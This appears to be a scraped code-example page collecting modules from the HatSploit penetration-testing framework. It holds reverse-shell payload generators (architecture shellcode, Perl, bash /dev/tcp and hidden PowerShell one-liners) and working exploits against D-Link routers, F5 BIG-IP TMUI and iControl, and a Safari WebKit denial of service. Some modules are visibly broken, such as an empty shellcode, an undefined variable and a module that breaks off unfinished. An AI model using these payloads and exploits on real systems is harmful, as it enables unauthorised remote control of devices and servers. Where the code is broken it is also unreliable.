コード例 #1
0
class HatSploitPayload(Payload, HatVenom, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Linux armle Shell Reverse TCP",
        'Payload': "linux/armle/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for Linux armle.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "armle",
        'Platform': "linux",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        offsets = {'lhost': local_host, 'lport': local_port}

        self.output_process("Generating shellcode...")
        shellcode = (b"\x01\x10\x8F\xE2"
                     b"\x11\xFF\x2F\xE1"
                     b"\x02\x20\x01\x21"
                     b"\x92\x1A\x0F\x02"
                     b"\x19\x37\x01\xDF"
                     b"\x06\x1C\x08\xA1"
                     b"\x10\x22\x02\x37"
                     b"\x01\xDF\x3F\x27"
                     b"\x02\x21\x30\x1c"
                     b"\x01\xdf\x01\x39"
                     b"\xFB\xD5\x05\xA0"
                     b"\x92\x1a\x05\xb4"
                     b"\x69\x46\x0b\x27"
                     b"\x01\xDF\xC0\x46"
                     b"\x02\x00"
                     b":lport:port:"
                     b":lhost:ip:"
                     b"\x2f\x62\x69\x6e"
                     b"\x2f\x73\x68\x00")

        self.output_process("Generating payload...")
        payload = self.generate('elf', 'armle', shellcode, offsets)

        return payload
コード例 #2
0
class HatSploitModule(Module, Handler, TCPClient):
    details = {
        'Name': "Reverse TCP Stager",
        'Module': "exploit/unix/stager/reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Reverse TCP Stager.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/bash_reverse_tcp",
        'Categories': None,
        'Architectures': None,
        'Platforms': None,
        'Types': None
    }

    options = {
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        },
        'FOREVER': {
            'Description': "Start listener forever.",
            'Value': "no",
            'Type': "boolean",
            'Required': False
        }
    }

    def run(self):
        local_host, local_port, forever = self.parse_options(self.options)

        if forever.lower() in ['yes', 'y']:
            while True:
                status = self.handle_session(host=local_host,
                                             port=local_port,
                                             payload=self.payload,
                                             method="reverse_tcp")

                if not status:
                    return
        else:
            self.handle_session(host=local_host,
                                port=local_port,
                                payload=self.payload,
                                method="reverse_tcp")
コード例 #3
0
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
    details = {
        'Category': "stager",
        'Name': "macOS x64 Shell Reverse TCP",
        'Payload': "macos/x64/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for macOS x64.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "x64",
        'Platform': "macos",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        },
        'FORMAT': {
            'Description': "Executable format.",
            'Value': "macho",
            'Type': None,
            'Required': True
        }
    }

    def run(self):
        local_host, local_port, executable_format = self.parse_options(
            self.options)

        local_host = self.host_to_bytes(local_host)
        local_port = self.port_to_bytes(local_port)

        if executable_format not in self.formats.keys():
            self.output_error("Invalid executable format!")
            return

        self.output_process("Generating shellcode...")
        shellcode = (b"")

        self.output_process("Generating payload...")
        payload = self.generate(executable_format, 'x64', shellcode)

        return payload
コード例 #4
0
class HatSploitPayload(Payload, TCPClient):
    config = Config()

    details = {
        'Category': "stager",
        'Name': "macOS aarch64 Membrane Reverse TCP",
        'Payload': "macos/aarch64/membrane_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Membrane reverse TCP payload for macOS aarch64.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "aarch64",
        'Platform': "macos",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        remote_data = base64.b64encode(
            (local_host + ':' + local_port).encode())
        remote_data = remote_data.decode()

        self.output_process("Generating payload...")

        try:
            binary = open(
                self.config.path_config['base_paths']['data_path'] +
                'payloads/macos/aarch64/membrane_reverse_tcp/bin/membrane.bin',
                'rb')
            payload = binary.read()
            binary.close()
        except Exception:
            self.output_error("Failed to generate payload!")
            return

        return payload, remote_data, HatSploitSession
コード例 #5
0
class HatSploitPayload(Payload, StringTools, TCPClient):
    details = {
        'Category': "stager",
        'Name': "macOS x64 Membrane Reverse TCP",
        'Payload': "macos/x64/membrane_reverse_tcp",
        'Authors': [
            'Ivan Nikolsky (enty8080)'
        ],
        'Description': "Membrane reverse TCP payload for macOS x64.",
        'Dependencies': [
            ''
        ],
        'Comments': [
            ''
        ],
        'Architecture': "x64",
        'Platform': "macos",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        local_host = self.xor_string(local_host)
        local_port = self.xor_string(local_port)

        self.output_process("Generating payload...")
        with open('data/membrane/macos/x64/membrane', 'rb') as f:
            payload = f.read()

        return payload, f"reverse '{local_host}' '{local_port}'", HatSploitSession
コード例 #6
0
class HatSploitPayload(Payload, HatVenom, TCPClient):
    details = {
        'Category': "stager",
        'Name': "macOS x64 Shell Reverse TCP",
        'Payload': "macos/x64/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for macOS x64.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "x64",
        'Platform': "macos",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        offsets = {'lhost': local_host, 'lport': local_port}

        self.output_process("Generating shellcode...")
        shellcode = (b":lhost:ip:" b":lport:port:")

        self.output_process("Generating payload...")
        payload = self.generate('macho', 'x64', shellcode, offsets)

        return payload
コード例 #7
0
class HatSploitPayload(Payload, TCPClient):
    details = {
        'Category': "single",
        'Name': "Perl Shell Reverse TCP",
        'Payload': "unix/generic/perl_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Perl shell reverse TCP payload.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "generic",
        'Platform': "unix",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)
        local_data = local_host + ':' + local_port

        self.output_process("Generating payload...")

        payload = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"LOCAL_DATA\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
        payload = payload.replace("LOCAL_DATA", local_data)

        return payload
コード例 #8
0
class HatSploitPayload(Payload, TCPClient):
    details = {
        'Category': "single",
        'Name': "Bash Shell Reverse TCP",
        'Payload': "unix/generic/bash_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Bash shell reverse TCP payload.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "generic",
        'Platform': "unix",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        self.output_process("Generating payload...")
        payload = f"/bin/sh &>/dev/tcp/{local_host}/{local_port} 0>&1 &"

        return payload
コード例 #9
0
class HatSploitModule(Module, Handler, StringTools, HTTPClient, TCPClient):
    details = {
        'Name': "D-Link hedwig Remote Code Execution",
        'Module': "exploit/unix/dlink/hedwig_code_execution",
        'Authors': ['Ivan Nikolsky (enty8080)', 'Roberto Paleari'],
        'Description':
        "Remote Code Execution in D-Link DIR-645 <= 1.03, DIR-300 <= 2.14, DIR-600.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "linux/mipsle/shell_reverse_tcp",
        'Categories': None,
        'Architectures': ['mipsle', 'mipsbe', 'generic'],
        'Platforms': None,
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        command = command.encode("utf-8")

        libcbase = 0x2aaf8000
        system = 0x000531FF
        calcsystem = 0x000158C8
        callsystem = 0x000159CC
        shellcode = self.random_string(973).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + system)
        shellcode += self.random_string(16).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + callsystem)
        shellcode += self.random_string(12).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + calcsystem)
        shellcode += self.random_string(16).encode("utf-8")
        shellcode += command

        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": b"uid=" + shellcode + b";"
        }

        data = {self.random_string(7): self.random_string(7)}

        self.http_request(method="POST",
                          host=remote_host,
                          port=remote_port,
                          path='/hedwig.cgi',
                          data=data,
                          headers=headers)

    def check_vulnerable(self, remote_host, remote_port):
        response = self.http_request(method="GET",
                                     host=remote_host,
                                     port=remote_port,
                                     path="/hedwig.cgi")

        if response is None or response.status_code != 200:
            return False

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        if not self.check_vulnerable(remote_host, remote_port):
            self.output_error("Exploit failed!")
            return

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)
コード例 #10
0
class HatSploitModule(Module, HTTPClient, TCPClient):
    details = {
        'Name': "iPhoneOS Safari WebKit Filter DoS",
        'Module': "exploit/iphoneos/safari/webkit_filter_dos",
        'Authors': ['Ivan Nikolsky (enty8080)', 'Sabri Haddouche (pwnsdx)'],
        'Description':
        "iPhoneOS 9.1 till 12.1 MobileSafari.app WebKit Filter DoS.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "iphoneos",
        'Risk': "high"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        },
        'FOREVER': {
            'Description': "Start http server forever.",
            'Value': "no",
            'Type': "boolean",
            'Required': False
        }
    }

    @staticmethod
    def generate():
        div_line = '<div>' * 3500 + '</div>' * 3500

        payload = """
        <html>
            <head>
                <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
                <style>
                    div {
                        backdrop-filter: blur(10px);
                        -webkit-backdrop-filter: blur(10px);
                        width:10000px; height:10000px;
                    }
                </style>
            </head>
            <body>
                """ + div_line + """
            </body>
        </html>
        """

        return payload

    def run(self):
        local_host, local_port, forever = self.parse_options(self.options)

        self.output_process(f"Performing DoS attack on {remote_host}...")

        payload = self.generate()
        self.start_server(local_host, local_port, payload,
                          True if forever in ['yes', 'y'] else False)

        self.output_success("DoS attack successfully completed!")
コード例 #11
0
class HatSploitPayload(Payload, HatVenom, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Linux x64 Shell Reverse TCP",
        'Payload': "linux/x64/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for Linux x64.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "x64",
        'Platform': "linux",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        offsets = {'lhost': local_host, 'lport': local_port}

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\x6a\x29"  # pushq  $0x29
            b"\x58"  # pop    %rax
            b"\x99"  # cltd
            b"\x6a\x02"  # pushq  $0x2
            b"\x5f"  # pop    %rdi
            b"\x6a\x01"  # pushq  $0x1
            b"\x5e"  # pop    %rsi
            b"\x0f\x05"  # syscall
            b"\x48\x97"  # xchg   %rax,%rdi
            b"\x48\xb9\x02\x00"  # movabs $0x100007fb3150002,%rcx
            b":lport:port:"  # port
            b":lhost:ip:"  # ip
            b"\x51"  # push   %rcx
            b"\x48\x89\xe6"  # mov    %rsp,%rsi
            b"\x6a\x10"  # pushq  $0x10
            b"\x5a"  # pop    %rdx
            b"\x6a\x2a"  # pushq  $0x2a
            b"\x58"  # pop    %rax
            b"\x0f\x05"  # syscall
            b"\x6a\x03"  # pushq  $0x3
            b"\x5e"  # pop    %rsi
            b"\x48\xff\xce"  # dec    %rsi
            b"\x6a\x21"  # pushq  $0x21
            b"\x58"  # pop    %rax
            b"\x0f\x05"  # syscall
            b"\x75\xf6"  # jne    27 <dup2_loop>
            b"\x6a\x3b"  # pushq  $0x3b
            b"\x58"  # pop    %rax
            b"\x99"  # cltd
            b"\x48\xbb\x2f\x62\x69\x6e\x2f"  # movabs $0x68732f6e69622f,%rbx
            b"\x73\x68\x00"  # [redacted]
            b"\x53"  # push   %rbx
            b"\x48\x89\xe7"  # mov    %rsp,%rdi
            b"\x52"  # push   %rdx
            b"\x57"  # push   %rdi
            b"\x48\x89\xe6"  # mov    %rsp,%rsi
            b"\x0f\x05"  # syscall
        )

        self.output_process("Generating payload...")
        payload = self.generate('elf', 'x64', shellcode, offsets)

        return payload
コード例 #12
0
class HatSploitPayload(Payload, HatVenom, TCPClient):
    details = {
        'Category': "stager",
        'Name': "macOS x64 Shell Reverse TCP",
        'Payload': "macos/x64/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for macOS x64.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "x64",
        'Platform': "macos",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        offsets = {'lhost': local_host, 'lport': local_port}

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\x41\xb0\x02"  # movb  $2, %r8b
            b"\x49\xc1\xe0\x18"  # shlq  $24, %r8
            b"\x49\x83\xc8\x61"  # orq  $97, %r8
            b"\x4c\x89\xc0"  # movq	 %r8, %rax
            b"\x48\x31\xd2"  # xorq  %rdx, %rdx
            b"\x48\x89\xd6"  # movq  %rdx, %rsi
            b"\x48\xff\xc6"  # incq  %rsi
            b"\x48\x89\xf7"  # movq  %rsi, %rdi
            b"\x48\xff\xc7"  # incq	 %rdi
            b"\x0f\x05"  # syscall
            b"\x49\x89\xc4"  # movq	 %rax, %r12
            b"\x49\xbd\x01\x01"  # movabsq  $-2750349055, %r13
            b":lport:port:"  # port
            b":lhost:ip:"  # host
            b"\x41\xb1\xff"  # movb  $-1, %r9b
            b"\x4d\x29\xcd"  # subq	 %r9, %r13
            b"\x41\x55"  # pushq  %r13
            b"\x49\x89\xe5"  # movq	 %rsp, %r13
            b"\x49\xff\xc0"  # incq	 %r8
            b"\x4c\x89\xc0"  # movq	 %r8, %rax
            b"\x4c\x89\xe7"  # movq	 %r12, %rdi
            b"\x4c\x89\xee"  # movq	 %r13, %rsi
            b"\x48\x83\xc2\x10"  # addq	 $16, %rdx
            b"\x0f\x05"  # syscall
            b"\x49\x83\xe8\x08"  # subq	 $8, %r8
            b"\x48\x31\xf6"  # xorq	 %rsi, %rsi
            b"\x4c\x89\xc0"  # movq	 %r8, %rax
            b"\x4c\x89\xe7"  # movq	 %r12, %rdi
            b"\x0f\x05"  # syscall
            b"\x48\x83\xfe\x02"  # cmpq	 $2, %rsi
            b"\x48\xff\xc6"  # incq	 %rsi
            b"\x76\xef"  # jbe  -17 <dup>
            b"\x49\x83\xe8\x1f"  # subq	 $31, %r8
            b"\x4c\x89\xc0"  # movq	 %r8, %rax
            b"\x48\x31\xd2"  # xorq	 %rdx, %rdx
            b"\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68"  # movabsq  $7526411553527181311, %r13
            b"\x49\xc1\xed\x08"  # shrq	 $8, %r13
            b"\x41\x55"  # pushq  %r13
            b"\x48\x89\xe7"  # movq	 %rsp, %rdi
            b"\x48\x31\xf6"  # xorq	 %rsi, %rsi
            b"\x0f\x05"  # syscall
        )

        self.output_process("Generating payload...")
        payload = self.generate('macho', 'x64', shellcode, offsets)

        return payload
コード例 #13
0
ファイル: big_ip_tmui_rce.py プロジェクト: 5l1v3r1/HatSploit
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "F5 Big-IP TMUI Remote Code Execution",
        'Module': "exploit/unix/f5/big_ip_tmui_rce",
        'Authors': ['Ivan Nikolsky (enty8080)', 'Mikhail Klyuchnikov'],
        'Description':
        "Remote Code Execution in F5 BIG-IP Traffic Management User Interface (TMUI).",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/netcat_reverse_tcp",
        'Categories': ['single'],
        'Architectures': None,
        'Platforms': None,
        'Types': ['reverse_tcp']
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': None,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        path = f"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}"

        self.http_request(method="GET",
                          host=remote_host,
                          port=remote_port,
                          path=path)

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)
コード例 #14
0
class HatSploitPayload(Payload, HatVenom, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Linux x86 Shell Reverse TCP",
        'Payload': "linux/x86/shell_reverse_tcp",
        'Authors': [
            'Ivan Nikolsky (enty8080)'
        ],
        'Description': "Shell reverse TCP payload for Linux x86.",
        'Dependencies': [
            ''
        ],
        'Comments': [
            ''
        ],
        'Architecture': "x86",
        'Platform': "linux",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        offsets = {
            'lhost': local_host,
            'lport': local_port
        }

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\x31\xdb"              # xor ebx,ebx
            b"\xf7\xe3"              # mul ebx
            b"\x53"                  # push ebx
            b"\x43"                  # inc ebx
            b"\x53"                  # push ebx
            b"\x6a\x02"              # push byte +0x2
            b"\x89\xe1"              # mov ecx,esp
            b"\xb0\x66"              # mov al,0x66 (sys_socketcall)
            b"\xcd\x80"              # int 0x80
            b"\x93"                  # xchg eax,ebx
            b"\x59"                  # pop ecx
            b"\xb0\x3f"              # mov al,0x3f (sys_dup2)
            b"\xcd\x80"              # int 0x80
            b"\x49"                  # dec ecx
            b"\x79\xf9"              # jns 0x11
            b"\x68:lhost:ip:"        # push ip addr
            b"\x68\x02\x00"          # push port
            b":lport:port:"
            b"\x89\xe1"              # mov ecx,esp
            b"\xb0\x66"              # mov al,0x66 (sys_socketcall)
            b"\x50"                  # push eax
            b"\x51"                  # push ecx
            b"\x53"                  # push ebx
            b"\xb3\x03"              # mov bl,0x3
            b"\x89\xe1"              # mov ecx,esp
            b"\xcd\x80"              # int 0x80
            b"\x52"                  # push edx
            b"\x68\x6e\x2f\x73\x68"  # push n/sh
            b"\x68\x2f\x2f\x62\x69"  # push //bi
            b"\x89\xe3"              # mov ebx,esp
            b"\x52"                  # push edx
            b"\x53"                  # push ebx
            b"\x89\xe1"              # mov ecx,esp
            b"\xb0\x0b"              # mov al,0xb (execve)
            b"\xcd\x80"              # int 0x80
        )

        self.output_process("Generating payload...")
        payload = self.generate('elf', 'x86', shellcode, offsets)

        return payload
コード例 #15
0
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Linux x86 Shell Reverse TCP",
        'Payload': "linux/x86/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for Linux x86.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "x86",
        'Platform': "linux",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        },
        'FORMAT': {
            'Description': "Executable format.",
            'Value': "elf",
            'Type': None,
            'Required': True
        }
    }

    def run(self):
        local_host, local_port, executable_format = self.parse_options(
            self.options)

        local_host = self.host_to_bytes(local_host)
        local_port = self.port_to_bytes(local_port)

        if executable_format not in self.formats.keys():
            self.output_error("Invalid executable format!")
            return

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\x31\xdb"  # xor ebx,ebx
            b"\xf7\xe3"  # mul ebx
            b"\x53"  # push ebx
            b"\x43"  # inc ebx
            b"\x53"  # push ebx
            b"\x6a\x02"  # push byte +0x2
            b"\x89\xe1"  # mov ecx,esp
            b"\xb0\x66"  # mov al,0x66 (sys_socketcall)
            b"\xcd\x80"  # int 0x80
            b"\x93"  # xchg eax,ebx
            b"\x59"  # pop ecx
            b"\xb0\x3f"  # mov al,0x3f (sys_dup2)
            b"\xcd\x80"  # int 0x80
            b"\x49"  # dec ecx
            b"\x79\xf9"  # jns 0x11
            b"\x68" + local_host +  # push ip addr
            b"\x68\x02\x00" + local_port +  # push port
            b"\x89\xe1"  # mov ecx,esp
            b"\xb0\x66"  # mov al,0x66 (sys_socketcall)
            b"\x50"  # push eax
            b"\x51"  # push ecx
            b"\x53"  # push ebx
            b"\xb3\x03"  # mov bl,0x3
            b"\x89\xe1"  # mov ecx,esp
            b"\xcd\x80"  # int 0x80
            b"\x52"  # push edx
            b"\x68\x6e\x2f\x73\x68"  # push n/sh
            b"\x68\x2f\x2f\x62\x69"  # push //bi
            b"\x89\xe3"  # mov ebx,esp
            b"\x52"  # push edx
            b"\x53"  # push ebx
            b"\x89\xe1"  # mov ecx,esp
            b"\xb0\x0b"  # mov al,0xb (execve)
            b"\xcd\x80"  # int 0x80
        )

        self.output_process("Generating payload...")
        payload = self.generate(executable_format, 'x86', shellcode)

        return payload
コード例 #16
0
class HatSploitPayload(Payload, TCPClient):
    details = {
        'Category': "single",
        'Name': "Powershell Reverse TCP",
        'Payload': "unix/generic/powershell_reverse_tcp",
        'Authors': [
            'Ivan Nikolsky (enty8080)'
        ],
        'Description': "Powershell reverse TCP payload.",
        'Dependencies': [
            ''
        ],
        'Comments': [
            ''
        ],
        'Architecture': "generic",
        'Platform': "windows",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        self.output_process("Generating payload...")

        source = (
                f"$a='{local_host}';"
                f"$b={local_port};"
                "$c=New-Object system.net.sockets.tcpclient;"
                "$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
                "$ob=New-Object System.Byte[] 65536;"
                "$eb=New-Object System.Byte[] 65536;"
                "$e=new-object System.Text.UTF8Encoding;"
                "$p=New-Object System.Diagnostics.Process;"
                "$p.StartInfo.FileName='cmd.exe';"
                "$p.StartInfo.RedirectStandardInput=1;"
                "$p.StartInfo.RedirectStandardOutput=1;"
                "$p.StartInfo.RedirectStandardError=1;"
                "$p.StartInfo.UseShellExecute=0;"
                "$q=$p.Start();"
                "$is=$p.StandardInput;"
                "$os=$p.StandardOutput;"
                "$es=$p.StandardError;"
                "$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);"
                "$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);"
                "$c.connect($a,$b);"
                "$s=$c.GetStream();"
                "while ($true) {"
                "start-sleep -m 100;"
                "if ($osread.IsCompleted -and $osread.Result -ne 0) {"
                "$r=$os.BaseStream.EndRead($osread);"
                "$s.Write($ob,0,$r);"
                "$s.Flush();"
                "$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);"
                "}"
                "if ($esread.IsCompleted -and $esread.Result -ne 0) {"
                "$r=$es.BaseStream.EndRead($esread);"
                "$s.Write($eb,0,$r);"
                "$s.Flush();"
                "$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);"
                "}"
                "if ($s.DataAvailable) {"
                "$r=$s.Read($nb,0,$nb.Length);"
                "if ($r -lt 1) {"
                "break;"
                "} else {"
                "$str=$e.GetString($nb,0,$r);"
                "$is.write($str);"
                "}"
                "}"
                "if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {"
                "break;"
                "}"
                "if ($p.ExitCode -ne $null) {"
                "break;"
                "}"
                "}"
        )

        payload = f"powershell -w hidden -nop -c {source}"

        return payload
コード例 #17
0
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "F5 Big-IP iControl Remote Code Execution",
        'Module': "exploit/unix/f5/big_ip_icontrol_rce",
        'Authors': [
            'Ivan Nikolsky (enty8080)',
            'Al1ex (Al1ex)'
        ],
        'Description': "Remote Code Execution in F5 BIG-IP iControl REST.",
        'Dependencies': [
            ''
        ],
        'Comments': [
            ''
        ],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/bash_reverse_tcp",
        'Categories': [
            'single'
        ],
        'Architectures': None,
        'Platforms': None,
        'Types': [
            'reverse_tcp'
        ]
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': None,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        headers = {
            "User-Agent": "None",
            "Content-Type": "application/json",
            "X-F5-Auth-Token": "",
            "Authorization": "Basic YWRtaW46QVNhc1M="
        }

        shell_trap = '/mgmt/tm/util/bash'
        payload = {"command": "run", "utilCmdArgs": f"-c '{command}'"}

        self.http_request(
            method="POST",
            host=remote_host,
            port=remote_port,
            headers=headers,
            path=shell_trap,
            json=payload
        )

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(self.options)

